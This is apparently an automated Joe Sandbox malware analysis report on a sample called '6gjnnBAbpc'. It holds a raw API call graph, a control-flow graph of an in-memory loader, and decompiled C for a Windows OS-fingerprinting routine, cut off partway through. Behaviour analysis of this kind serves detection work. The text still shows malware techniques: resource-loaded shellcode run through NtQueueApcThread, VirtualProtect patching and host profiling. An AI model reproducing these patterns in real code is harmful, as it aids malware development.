17378->17384 17379->17362 17380->17379 17382 40d20d 17380->17382 17399 40ce80 17380->17399 17382->17379 17385 40d242 VirtualQuery 17382->17385 17383 40ce80 8 API calls 17383->17384 17384->17379 17384->17382 17384->17383 17385->17379 17386 40d268 VirtualProtect 17385->17386 17386->17382 17387->17368 17389 40d43a 17388->17389 17390 40d3e0 17388->17390 17389->17370 17415 40cbe0 17390->17415 17394 41909a 17393->17394 17395 40d430 4 API calls 17394->17395 17396 4190a6 17395->17396 17426 402075 17396->17426 17400 40d070 17399->17400 17404 40ce9f 17399->17404 17400->17380 17402 40cf66 17403 40cf6e memcpy 17402->17403 17406 40cfa5 VirtualProtect memcpy 17402->17406 17405 40cf84 17403->17405 17407 40cef7 VirtualQuery 17404->17407 17410 40cf37 VirtualQuery 17404->17410 17412 40d097 17404->17412 17405->17380 17406->17405 17408 40cfea 17406->17408 17407->17410 17408->17405 17409 40cfef VirtualProtect 17408->17409 17409->17380 17410->17402 17410->17412 17411 40d0c9 17411->17380 17412->17411 17413 40d242 VirtualQuery 17412->17413 17413->17411 17414 40d268 VirtualProtect 17413->17414 17414->17412 17418 40cb20 17415->17418 17417 40cbef 17417->17370 17419 40cb31 17418->17419 17420 40cbc0 _onexit 17419->17420 17421 40cb3e _lock 17419->17421 17420->17417 17422 40cb57 17421->17422 17423 40cb68 __dllonexit 17422->17423 17424 40cb96 17423->17424 17425 40cba7 _unlock 17424->17425 17425->17417 17442 40e1a0 17426->17442 17428 4020b9 LoadIconA 17430 402161 17428->17430 17431 4021a1 CreateWindowExA 17430->17431 17434 40216e 17430->17434 17432 40224f 17431->17432 17431->17434 17464 401e50 ZwOpenSymbolicLinkObject 17432->17464 17473 40e320 17434->17473 17437 4013ee 17437->17360 17437->17373 17440 401ebb 130 API calls 17441 40231d memset NtQueueApcThread NtTestAlert 17440->17441 17441->17434 17443 40e250 17442->17443 17444 40e1b5 17442->17444 17487 40ec50 strlen 17443->17487 17445 40e1bf 17444->17445 17526 40dcb0 17444->17526 17450 40ec50 12 API calls 17445->17450 17452 40e1cc 17445->17452 17448 40e1d2 17451 40e1df 17448->17451 17454 40ec50 12 API calls 17448->17454 17449 40e207 17455 40ec50 12 API calls 17449->17455 17462 40e214 17449->17462 17450->17452 17505 411c20 GetLastError 17451->17505 17452->17448 17452->17449 17454->17451 17456 40e2e2 17455->17456 17460 40ec50 12 API calls 17456->17460 17456->17462 17457 40e1e9 17458 40e1f4 17457->17458 17459 40ec50 12 API calls 17457->17459 17512 411c90 GetLastError 17458->17512 17459->17458 17460->17462 17462->17428 17463 40e202 17463->17428 17465 401e85 ZwOpenSymbolicLinkObject 17464->17465 17466 401e7e 17464->17466 17465->17466 17467 401ebb 17466->17467 17468 40e1a0 127 API calls 17467->17468 17469 401eff LdrFindResource_U LdrAccessResource NtAllocateVirtualMemory 17468->17469 17470 401fe1 17469->17470 17471 40e320 125 API calls 17470->17471 17472 40206d 17471->17472 17472->17440 17474 40e3d6 17473->17474 17475 40e337 17473->17475 17477 40ec50 12 API calls 17474->17477 17476 40e33d 17475->17476 17479 40dcb0 119 API calls 17475->17479 17478 40e346 17476->17478 17480 40ec50 12 API calls 17476->17480 17477->17475 17483 40ec50 12 API calls 17478->17483 17485 40e34c 17478->17485 17479->17476 17480->17478 17481 40e355 17484 411c90 112 API calls 17481->17484 17482 40ec50 12 API calls 17482->17481 17483->17485 17486 40e363 17484->17486 17485->17437 17485->17481 17485->17482 17486->17437 17488 40db20 17487->17488 17489 40ec71 memcpy CreateMutexA WaitForSingleObject 17488->17489 17490 40ed37 17489->17490 17491 40ed38 FindAtomA 17489->17491 17490->17491 17492 40edd3 17491->17492 17493 40ed4d malloc 17491->17493 17495 40ebe0 GetAtomNameA 17492->17495 17494 40ed65 AddAtomA 17493->17494 17499 40ed86 17494->17499 17496 40ede6 17495->17496 17498 40eda7 ReleaseMutex FindCloseChangeNotification 17496->17498 17498->17444 17536 40ebe0 17499->17536 17502 40edea memset 17502->17498 17504 40ee08 17502->17504 17503 40ed9f free 17503->17498 17504->17498 17506 4102f0 106 API calls 17505->17506 17507 411c36 17506->17507 17508 414700 2 API calls 17507->17508 17509 411c43 17508->17509 17510 414660 Sleep 17509->17510 17511 411c65 SetLastError 17510->17511 17511->17457 17513 4102f0 106 API calls 17512->17513 17514 411ca7 17513->17514 17515 414700 2 API calls 17514->17515 17516 411cb4 17515->17516 17517 411cf0 realloc 17516->17517 17518 411cbc 17516->17518 17519 411d10 realloc 17517->17519 17520 411d84 17517->17520 17521 414660 Sleep 17518->17521 17519->17520 17522 411d2c memset memset 17519->17522 17523 414660 Sleep 17520->17523 17524 411cd7 SetLastError 17521->17524 17522->17518 17525 411d8c 17523->17525 17524->17463 17525->17463 17527 40dcf6 17526->17527 17528 40dcbc 17526->17528 17529 40ec50 12 API calls 17527->17529 17540 4111d0 17528->17540 17529->17528 17532 40dcd9 17533 40dcdf 17532->17533 17535 40ec50 12 API calls 17532->17535 17533->17445 17534 40ec50 12 API calls 17534->17532 17535->17533 17537 40ebf7 17536->17537 17538 40ebf8 GetAtomNameA 17536->17538 17537->17538 17539 40ec10 17538->17539 17539->17502 17539->17503 17541 4111ea 17540->17541 17557 40dccc 17540->17557 17542 40f1c0 21 API calls 17541->17542 17541->17557 17543 4111f8 17542->17543 17544 413fd0 106 API calls 17543->17544 17545 411205 17544->17545 17546 411250 17545->17546 17547 41120b 17545->17547 17548 4102f0 106 API calls 17546->17548 17549 411230 17547->17549 17550 411210 fprintf 17547->17550 17552 411261 17548->17552 17551 413a00 19 API calls 17549->17551 17550->17549 17553 411238 17551->17553 17554 4102f0 106 API calls 17552->17554 17555 40f340 20 API calls 17553->17555 17556 411279 17554->17556 17555->17557 17558 4102f0 106 API calls 17556->17558 17557->17532 17557->17534 17558->17549 17559 40fc09 17560 40fc10 17559->17560 17561 414330 12 API calls 17560->17561 17562 40fc2c 17561->17562 17563 40fcc9 17564 40fcd0 17563->17564 17565 414330 12 API calls 17564->17565 17566 40fcae TlsAlloc 17565->17566 17568 40fcf5 17566->17568 17572 40fcbf 17566->17572 17569 414330 12 API calls 17568->17569 17569->17572 17570 40fcc4 17571 40fd18 abort 17572->17570 17572->17571 17573 40dbc9 17574 40dbd0 17573->17574 17575 40ec50 12 API calls 17574->17575 17576 40db7e 17575->17576 17578 40ec50 12 API calls 17576->17578 17580 40db87 17576->17580 17578->17580 17579 40db97 17581 4112b0 17580->17581 17582 4112cc 17581->17582 17612 4114dd 17581->17612 17583 4112d9 17582->17583 17584 411598 17582->17584 17626 415890 17583->17626 17585 414330 12 API calls 17584->17585 17588 4115b4 17585->17588 17587 4112e1 17587->17588 17590 4112ee 17587->17590 17589 414330 12 API calls 17588->17589 17593 4114b0 17589->17593 17591 4114e7 17590->17591 17592 414330 12 API calls 17590->17592 17590->17593 17598 411354 17590->17598 17594 414330 12 API calls 17591->17594 17592->17590 17596 414330 12 API calls 17593->17596 17605 4114a2 17593->17605 17623 411462 17593->17623 17599 411503 17594->17599 17595 414330 12 API calls 17595->17598 17600 411600 17596->17600 17597 4113ae 17597->17600 17607 4113bd 17597->17607 17598->17593 17598->17595 17598->17597 17598->17599 17601 414330 12 API calls 17599->17601 17603 414330 12 API calls 17600->17603 17601->17623 17602 411550 17604 41155d 17602->17604 17602->17623 17603->17623 17608 4157e0 106 API calls 17604->17608 17606 4114d5 17605->17606 17610 414330 12 API calls 17605->17610 17609 4157e0 106 API calls 17606->17609 17607->17602 17613 4117f4 17607->17613 17614 41140f realloc 17607->17614 17607->17623 17611 411565 17608->17611 17609->17612 17610->17606 17611->17579 17612->17579 17615 414330 12 API calls 17613->17615 17614->17602 17616 411427 17614->17616 17617 41181a 17615->17617 17619 411434 memset 17616->17619 17616->17623 17618 414330 12 API calls 17617->17618 17620 411840 17618->17620 17619->17623 17621 414330 12 API calls 17621->17623 17622 41149a 17622->17605 17624 4117d8 17622->17624 17623->17605 17623->17617 17623->17621 17623->17622 17625 414330 12 API calls 17624->17625 17625->17613 17627 412210 106 API calls 17626->17627 17628 41589e 17627->17628 17629 415320 34 API calls 17628->17629 17630 4158a6 17629->17630 17631 4158aa 17630->17631 17648 414e80 17630->17648 17631->17587 17633 415947 17679 414f30 17633->17679 17634 415971 InterlockedIncrement 17634->17633 17636 4158be 17636->17633 17636->17634 17656 411e50 17636->17656 17637 41598a 17637->17587 17640 411e50 106 API calls 17642 415915 17640->17642 17643 41593f 17642->17643 17645 415960 17642->17645 17659 416a70 17642->17659 17644 411e50 106 API calls 17643->17644 17644->17633 17646 411e50 106 API calls 17645->17646 17647 415965 17646->17647 17647->17634 17649 413fd0 106 API calls 17648->17649 17650 414e92 17649->17650 17651 414e96 17650->17651 17652 413fd0 106 API calls 17650->17652 17651->17636 17653 414eab 17652->17653 17653->17651 17654 413a00 19 API calls 17653->17654 17655 414ebb 17654->17655 17655->17636 17657 4102f0 106 API calls 17656->17657 17658 411e58 17657->17658 17658->17640 17660 412210 106 API calls 17659->17660 17661 416a81 17660->17661 17663 416a95 17661->17663 17678 416a9d 17661->17678 17697 4161d0 17661->17697 17663->17678 17713 416590 EnterCriticalSection InterlockedDecrement LeaveCriticalSection 17663->17713 17665 416ad4 17666 416adb EnterCriticalSection LeaveCriticalSection 17665->17666 17665->17678 17720 415cc0 EnterCriticalSection 17666->17720 17668 416b12 17669 411e50 106 API calls 17668->17669 17668->17678 17670 416b3a 17669->17670 17671 411e50 106 API calls 17670->17671 17672 416b47 17671->17672 17673 413a00 19 API calls 17672->17673 17674 416b5a 17673->17674 17675 416b61 17674->17675 17677 416590 106 API calls 17674->17677 17676 411e50 106 API calls 17675->17676 17676->17678 17677->17675 17678->17642 17680 414f43 17679->17680 17681 414fb5 17679->17681 17683 414700 2 API calls 17680->17683 17682 414330 12 API calls 17681->17682 17682->17680 17684 414f4b 17683->17684 17685 414fdd fprintf exit 17684->17685 17687 414f62 17684->17687 17686 414330 12 API calls 17685->17686 17688 41503f 17686->17688 17689 414f82 17687->17689 17690 414f72 17687->17690 17688->17637 17692 414330 12 API calls 17689->17692 17691 414660 Sleep 17690->17691 17693 414f7a 17691->17693 17694 414f9e 17692->17694 17693->17637 17695 414660 Sleep 17694->17695 17696 414fad 17695->17696 17696->17637 17698 4161e1 17697->17698 17699 416246 17697->17699 17701 414700 2 API calls 17698->17701 17700 414330 12 API calls 17699->17700 17700->17698 17702 4161ee 17701->17702 17703 4161f9 17702->17703 17727 416080 17702->17727 17704 416213 17703->17704 17705 416203 17703->17705 17708 414330 12 API calls 17704->17708 17707 414660 Sleep 17705->17707 17709 41620b 17707->17709 17710 41622f 17708->17710 17709->17663 17711 414660 Sleep 17710->17711 17712 41623e 17711->17712 17712->17663 17714 4165e6 17713->17714 17715 4165de 17713->17715 17716 416290 100 API calls 17714->17716 17715->17665 17717 4165ff EnterCriticalSection 17716->17717 17718 416610 LeaveCriticalSection 17717->17718 17719 416625 InterlockedIncrement 17717->17719 17718->17665 17719->17718 17721 415cf6 17720->17721 17722 415d18 InterlockedExchangeAdd 17720->17722 17721->17722 17723 415cf8 LeaveCriticalSection 17721->17723 17724 415d36 ReleaseSemaphore 17722->17724 17725 415d5d LeaveCriticalSection 17722->17725 17723->17668 17724->17725 17726 415d73 InterlockedExchangeAdd LeaveCriticalSection 17724->17726 17725->17668 17726->17668 17728 416187 17727->17728 17729 41609c 17727->17729 17728->17703 17729->17728 17730 4160ab calloc 17729->17730 17730->17728 17731 4160ce CreateSemaphoreA CreateSemaphoreA 17730->17731 17732 416144 17731->17732 17733 41619f 17731->17733 17736 416190 CloseHandle 17732->17736 17737 416148 InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection 17732->17737 17734 4161a3 CloseHandle 17733->17734 17735 4161af free 17733->17735 17734->17735 17735->17728 17736->17733 17737->17728 17738 401a9c 17739 401ab0 17738->17739 17740 401aba 17738->17740 17741 401ab5 17739->17741 17742 401ac8 17739->17742 17741->17740 17743 401af8 CreateWindowExA 17741->17743 17742->17740 17744 401c5d 17742->17744 17747 401c37 17742->17747 17746 401b6d SendDlgItemMessageA 17743->17746 17749 401879 17744->17749 17746->17740 17747->17740 17748 401879 128 API calls 17747->17748 17748->17740 17750 40e1a0 127 API calls 17749->17750 17751 4018bd memset 17750->17751 17752 4019c6 17751->17752 17753 401929 17751->17753 17758 401987 17752->17758 17764 401520 17752->17764 17753->17758 17759 4016d2 17753->17759 17756 40e320 125 API calls 17757 401a8e 17756->17757 17757->17740 17758->17756 17760 40e1a0 127 API calls 17759->17760 17763 40170a 17760->17763 17761 40e320 125 API calls 17762 40186e 17761->17762 17762->17758 17763->17761 17765 40e1a0 127 API calls 17764->17765 17768 401558 17765->17768 17766 40e320 125 API calls 17767 4016c7 17766->17767 17767->17758 17768->17766 17769 4004cad 17770 4004cb6 17769->17770 17772 4004cc3 17770->17772 17774 40052a2 17770->17774 17771 4008370 24 API calls 17773 4005344 17771->17773 17778 4004db7 GetCurrentThreadId 17772->17778 17779 4004e2c 17772->17779 17814 4004ce5 17772->17814 17775 4005354 lstrlenA lstrlenA 17773->17775 17776 40056b8 VirtualFree VirtualFree VirtualFree 17773->17776 17774->17771 17775->17776 17777 4005385 wsprintfA CryptBinaryToStringA 17775->17777 17780 40056eb 17776->17780 17777->17776 17781 40053d0 MultiByteToWideChar 17777->17781 17778->17814 17783 4004ee1 17779->17783 17784 4004e81 GetSystemMetrics GetSystemMetrics 17779->17784 17779->17814 17780->17780 17782 40017d0 16 API calls 17781->17782 17785 400543e 17782->17785 17786 4004f40 17783->17786 17787 4004ef0 GlobalMemoryStatus 17783->17787 17784->17814 17788 400569b 17785->17788 17790 400551b 17785->17790 17791 400547d VirtualFree 17785->17791 17792 4005032 17786->17792 17793 4004fdf lstrlenA 17786->17793 17786->17814 17787->17814 17788->17776 17789 40056a4 VirtualFree 17788->17789 17789->17776 17790->17788 17794 400552c EnterCriticalSection 17790->17794 17797 40054b1 17791->17797 17795 4005041 lstrlenA 17792->17795 17796 4005096 17792->17796 17793->17814 17798 4005542 VirtualAlloc 17794->17798 17799 400558c VirtualAlloc 17794->17799 17795->17814 17800 4005104 17796->17800 17801 40050a5 lstrlenA 17796->17801 17797->17790 17807 40017d0 16 API calls 17797->17807 17802 4005578 17798->17802 17805 40055c7 GetTickCount 17799->17805 17806 400568e LeaveCriticalSection 17799->17806 17803 4005172 17800->17803 17804 4005113 lstrlenA 17800->17804 17801->17814 17802->17806 17808 40051e0 17803->17808 17809 4005181 lstrlenA 17803->17809 17804->17814 17813 40055da 17805->17813 17806->17788 17807->17797 17810 400523f 17808->17810 17811 40051ef lstrlenA 17808->17811 17809->17814 17812 4009b90 QueryPerformanceCounter 17810->17812 17810->17814 17811->17814 17812->17814 17815 400565c VirtualFree 17813->17815 17815->17806 17816 413c9c 17817 413ca0 17816->17817 17818 414330 12 API calls 17817->17818 17819 413be5 17818->17819 17820 414700 2 API calls 17819->17820 17821 413bef 17820->17821 17826 413c83 17821->17826 17827 413c07 17821->17827 17831 413c10 17821->17831 17834 413c24 17821->17834 17822 413c30 17824 414660 Sleep 17822->17824 17823 413af0 19 API calls 17823->17834 17828 413c38 17824->17828 17825 414330 12 API calls 17829 413c6c 17825->17829 17830 413c8c 17826->17830 17836 414330 12 API calls 17826->17836 17827->17831 17832 413cc8 17827->17832 17837 414660 Sleep 17829->17837 17833 413af0 19 API calls 17830->17833 17831->17823 17831->17834 17832->17830 17835 413cd1 17832->17835 17833->17834 17834->17822 17839 413c4f 17834->17839 17838 414330 12 API calls 17835->17838 17836->17830 17840 413c7b 17837->17840 17838->17830 17839->17825 17841 41529c 17842 4152a0 17841->17842 17843 414330 12 API calls 17842->17843 17844 415250 17843->17844 17845 414700 2 API calls 17844->17845 17846 415258 17845->17846 17847 4152c5 17846->17847 17848 41525d 17846->17848 17860 415130 17847->17860 17850 415266 17848->17850 17851 415278 17848->17851 17854 414660 Sleep 17850->17854 17852 414330 12 API calls 17851->17852 17852->17850 17853 4152d5 17855 4152e1 17853->17855 17858 414330 12 API calls 17853->17858 17856 41526e 17854->17856 17857 414660 Sleep 17855->17857 17857->17856 17858->17855 17861 4151cf 17860->17861 17862 415148 calloc 17860->17862 17861->17853 17862->17861 17863 41516d 17862->17863 17864 413af0 19 API calls 17863->17864 17865 41519b 17864->17865 17866 4151a1 17865->17866 17867 4151e8 free 17865->17867 17868 413af0 19 API calls 17866->17868 17867->17853 17870 4151b4 17868->17870 17869 415200 17872 4140e0 16 API calls 17869->17872 17870->17869 17871 416080 9 API calls 17870->17871 17873 4151cb 17871->17873 17874 41520c free 17872->17874 17873->17861 17875 4140e0 16 API calls 17873->17875 17874->17861 17875->17869

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 0 e60000-e603d9 call e609fc * 2 13 e609ef 0->13 14 e603df-e603e6 0->14 15 e609f1-e609fb 13->15 14->13 16 e603ec-e603f3 14->16 16->13 17 e603f9-e60400 16->17 17->13 18 e60406-e6040f 17->18 18->13 19 e60415-e6042a 18->19 19->13 20 e60430-e60439 19->20 20->13 21 e6043f-e60444 20->21 21->13 22 e6044a-e60459 21->22 23 e60483-e604aa GetNativeSystemInfo 22->23 24 e6045b 22->24 23->13 26 e604b0-e604c7 VirtualAlloc 23->26 25 e6045d-e60463 24->25 27 e60465 25->27 28 e60468-e6047a 25->28 29 e604dc-e604e0 26->29 30 e604c9-e604d8 26->30 27->28 28->25 31 e6047c 28->31 32 e60504-e60509 29->32 33 e604e2-e604f1 29->33 30->29 31->23 35 e6051a-e60536 32->35 36 e6050b-e60518 32->36 34 e604fd-e60500 33->34 38 e60502 34->38 39 e604f3-e604fc 34->39 40 e6056a-e6057b 35->40 41 e60538 35->41 36->35 36->36 38->35 39->34 43 e60581-e60588 40->43 44 e6063e-e6064f 40->44 42 e6053a-e6053e 41->42 45 e60540-e60554 42->45 46 e6055a-e60568 42->46 43->44 47 e6058e-e60599 43->47 48 e60655-e6066d 44->48 49 e6081e-e60828 44->49 45->45 50 e60556 45->50 46->40 46->42 47->44 51 e6059f-e605a3 47->51 52 e6066f-e60676 48->52 53 e6067c-e60689 48->53 54 e608e4-e608f7 49->54 55 e6082e-e60841 49->55 50->46 62 e605a4-e605a7 51->62 52->52 56 e60678 52->56 58 e60751-e6075d 53->58 59 e6068f-e60692 53->59 60 e60997-e609ab 54->60 61 e608fd-e60901 54->61 55->54 57 e60847 55->57 56->53 64 e6084b-e60868 57->64 58->49 67 e60763-e60780 58->67 59->58 65 e60698-e606b0 59->65 81 e609d6-e609e2 call 10002720 60->81 82 e609ad-e609bb 60->82 66 e60902-e60905 61->66 63 e6061b-e60626 62->63 72 e60628-e6062d 63->72 73 e605a9-e605bb 63->73 88 e608c5-e608d3 64->88 89 e6086a 64->89 65->58 68 e606b6-e606c8 65->68 69 e60907-e60917 66->69 70 e60979-e6098a 66->70 96 e60782 67->96 97 e607df-e607e5 67->97 78 e606cc-e6073a 68->78 79 e60934-e60936 69->79 80 e60919-e6091b 69->80 70->66 77 e60990 70->77 72->62 84 e60633-e60637 72->84 74 e605e5-e605e9 73->74 75 e605bd-e605e3 73->75 86 e605eb-e605f6 74->86 87 e605f8-e605fd 74->87 85 e60619 75->85 77->60 78->78 90 e6073c-e6074b 78->90 94 e60942-e60944 79->94 95 e60938-e60940 79->95 91 e60927-e60932 80->91 92 e6091d-e60925 80->92 101 e609e4-e609ed 81->101 82->81 93 e609bd-e609bf 82->93 84->44 85->63 86->85 103 e60606-e60609 87->103 104 e605ff-e60604 87->104 88->64 102 e608d9-e608dd 88->102 98 e6086e-e60872 89->98 90->58 105 e6094a-e60955 91->105 92->105 99 e609c0-e609cd 93->99 108 e60945-e60947 94->108 95->108 100 e60786-e60788 96->100 106 e607e7-e607eb 97->106 107 e60804-e60814 97->107 109 e60874-e6087b 98->109 110 e6087d-e6088a 98->110 130 e609cf 99->130 114 e60793-e607a0 100->114 115 e6078a-e60791 100->115 101->15 102->54 103->85 112 e6060b 103->112 111 e6060e-e60616 104->111 117 e60957-e6095c 105->117 118 e60960-e60975 105->118 106->107 113 e607ed-e607f4 106->113 107->67 116 e6081a 107->116 108->105 119 e608ad-e608b9 109->119 120 e60897-e608ac 110->120 121 e6088c-e60891 110->121 111->85 112->111 113->107 126 e607f6-e607fc 113->126 124 e607a2-e607a7 114->124 125 e607ad-e607c2 114->125 123 e607c3-e607d0 115->123 116->49 117->118 118->70 135 e608c1 119->135 136 e608bb-e608bf 119->136 120->119 121->121 129 e60893 121->129 133 e607d2-e607d6 123->133 134 e607d8 123->134 124->124 127 e607a9 124->127 125->123 126->107 127->125 129->120 130->81 133->100 134->97 135->88 136->98
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 00E6048B
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 00E604BB
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.649432754.0000000000E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e60000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AllocInfoNativeSystemVirtual
                                                                                                                                                                                                                                                                                                        • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                                                                                                                                                                                                                                                        • API String ID: 2032221330-2899676511
                                                                                                                                                                                                                                                                                                        • Opcode ID: b17be84647fb9a37d8dfb2ad1ea4cf6635db13367d3ffc36cd2cdcf193e76639
                                                                                                                                                                                                                                                                                                        • Instruction ID: 52ea65827af647618a7a05eb0cd1ae8c253ccba33d0cee5eb7ac2a7edb837d09
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b17be84647fb9a37d8dfb2ad1ea4cf6635db13367d3ffc36cd2cdcf193e76639
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D5299715483918FE324CF24D880BABBBE1FF94744F04582EE9C99B252E770E948CB56
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 138 4008f80-4008f94 139 4008f9a-4008f9e 138->139 140 400927b-4009281 138->140 139->140 141 4008fa4-4008fa8 139->141 141->140 142 4008fae-4008fff call 4007d20 * 3 GetVersionExA 141->142 149 4009005-4009016 GetSystemInfo 142->149 150 4009266-400926a 142->150 152 4009115-400911c 149->152 153 400901c-4009023 149->153 150->140 151 400926c-4009275 lstrcatA 150->151 151->140 154 4009210-4009217 call 4009290 152->154 155 4009122-4009129 152->155 156 4009042-4009049 153->156 157 4009025-400903d lstrcatA 153->157 173 4009228-4009237 lstrlenA 154->173 174 4009219-4009222 lstrcatA 154->174 158 4009174-400917b 155->158 159 400912b-4009132 155->159 162 4009068-400906f 156->162 163 400904b-4009063 lstrcatA 156->163 161 4009110 157->161 168 40091c3-40091ca 158->168 169 400917d-4009184 158->169 164 4009134-400914c lstrcatA 159->164 165 400914e-4009155 159->165 161->154 162->161 167 4009075-400907c 162->167 163->161 171 400916f 164->171 165->171 172 4009157-4009169 lstrcatA 165->172 175 40090a1-40090ab GetSystemMetrics 167->175 176 400907e-4009085 167->176 168->154 170 40091cc-40091d3 168->170 177 40091a0-40091a7 169->177 178 4009186-400919e lstrcatA 169->178 183 40091d5-40091ed lstrcatA 170->183 184 40091ef-40091f6 170->184 171->154 172->171 185 4009259-4009263 lstrlenA 173->185 186 4009239-4009253 lstrcatA * 2 173->186 174->173 179 40090c7-40090d1 GetSystemMetrics 175->179 180 40090ad-40090c5 lstrcatA 175->180 176->175 187 4009087-400909f lstrcatA 176->187 181 40091c1 177->181 182 40091a9-40091bb lstrcatA 177->182 178->181 188 40090d3-40090eb lstrcatA 179->188 189 40090ed-40090f6 179->189 180->161 181->154 182->181 183->154 184->154 190 40091f8-400920a lstrcatA 184->190 185->150 186->185 187->161 188->161 189->161 191 40090f8-400910a lstrcatA 189->191 190->154 191->161
                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E04008F80(CHAR* _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                                                                                                                        				struct _SYSTEM_INFO _v44;
                                                                                                                                                                                                                                                                                                        				signed int _v50;
                                                                                                                                                                                                                                                                                                        				signed short _v52;
                                                                                                                                                                                                                                                                                                        				struct _OSVERSIONINFOA _v204;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                                                                                                                        					L45:
                                                                                                                                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					E04007D20(E04007D20(_a8, _a4, 0, _a8),  &_v204, 0, 0x9c);
                                                                                                                                                                                                                                                                                                        					_v204.dwOSVersionInfoSize = 0x9c;
                                                                                                                                                                                                                                                                                                        					E04007D20( &_v44,  &_v44, 0, 0x24);
                                                                                                                                                                                                                                                                                                        					if(GetVersionExA( &_v204) == 0) {
                                                                                                                                                                                                                                                                                                        						L43:
                                                                                                                                                                                                                                                                                                        						if(_v8 == 0) {
                                                                                                                                                                                                                                                                                                        							lstrcatA(_a4, "UndefinedOS");
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						goto L45;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					GetSystemInfo( &_v44); // executed
                                                                                                                                                                                                                                                                                                        					if(_v204.dwMajorVersion != 5) {
                                                                                                                                                                                                                                                                                                        						if(_v204.dwMajorVersion == 6) {
                                                                                                                                                                                                                                                                                                        							if(_v204.dwMinorVersion != 0) {
                                                                                                                                                                                                                                                                                                        								if(_v204.dwMinorVersion != 1) {
                                                                                                                                                                                                                                                                                                        									if(_v204.dwMinorVersion == 2) {
                                                                                                                                                                                                                                                                                                        										if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                                                        											if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                                                        												lstrcatA(_a4, "Win8");
                                                                                                                                                                                                                                                                                                        												 *_a12 = 0xb;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											lstrcatA(_a4, "WinServer2012");
                                                                                                                                                                                                                                                                                                        											 *_a12 = 0xc;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                                                        										if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                                                        											lstrcatA(_a4, "Win7");
                                                                                                                                                                                                                                                                                                        											 *_a12 = 8;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										lstrcatA(_a4, "WinServer2008R2");
                                                                                                                                                                                                                                                                                                        										 *_a12 = 0xa;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								if((_v50 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                                                        									if((_v50 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                                                        										lstrcatA(_a4, "WinServer2008");
                                                                                                                                                                                                                                                                                                        										 *_a12 = 9;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									lstrcatA(_a4, "Vista");
                                                                                                                                                                                                                                                                                                        									 *_a12 = 7;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						L38:
                                                                                                                                                                                                                                                                                                        						if(E04009290() != 0) {
                                                                                                                                                                                                                                                                                                        							lstrcatA(_a4, "_x64");
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						if(lstrlenA( &(_v204.szCSDVersion)) != 0) {
                                                                                                                                                                                                                                                                                                        							lstrcatA(_a4, "_");
                                                                                                                                                                                                                                                                                                        							lstrcatA(_a4,  &(_v204.szCSDVersion));
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v8 = lstrlenA(_a4);
                                                                                                                                                                                                                                                                                                        						goto L43;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(_v204.dwMinorVersion != 0) {
                                                                                                                                                                                                                                                                                                        						if(_v204.dwMinorVersion != 1) {
                                                                                                                                                                                                                                                                                                        							if(_v204.dwMinorVersion == 2) {
